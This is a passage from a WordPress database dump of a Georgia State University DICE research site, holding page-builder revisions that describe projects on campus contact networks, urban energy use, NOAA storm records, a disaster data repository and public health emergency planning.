class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:38:20','2023-09-29 14:38:20','',126,'https://gsudice.dataconn.net/?p=1477',0,'revision','',0),(1483,1,'2023-09-29 10:38:40','2023-09-29 14:38:40','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:38:40','2023-09-29 14:38:40','',438,'https://gsudice.dataconn.net/?p=1483',0,'revision','',0),(1484,1,'2023-09-29 10:38:40','2023-09-29 14:38:40','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:38:40','2023-09-29 14:38:40','',126,'https://gsudice.dataconn.net/?p=1484',0,'revision','',0),(1489,1,'2023-09-29 10:40:20','2023-09-29 14:40:20','','raychel-sanner-cswvKS59E90-unsplash','','inherit','open','closed','','raychel-sanner-cswvks59e90-unsplash','','','2023-09-29 10:40:20','2023-09-29 14:40:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/raychel-sanner-cswvKS59E90-unsplash.jpg',0,'attachment','image/jpeg',0),(1490,1,'2023-09-29 10:40:31','2023-09-29 14:40:31','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1.jpg','raychel-sanner-cswvKS59E90-unsplash','','inherit','open','closed','','raychel-sanner-cswvks59e90-unsplash-2','','','2023-09-29 10:40:31','2023-09-29 14:40:31','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(1492,1,'2023-09-29 10:40:35','2023-09-29 14:40:35','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 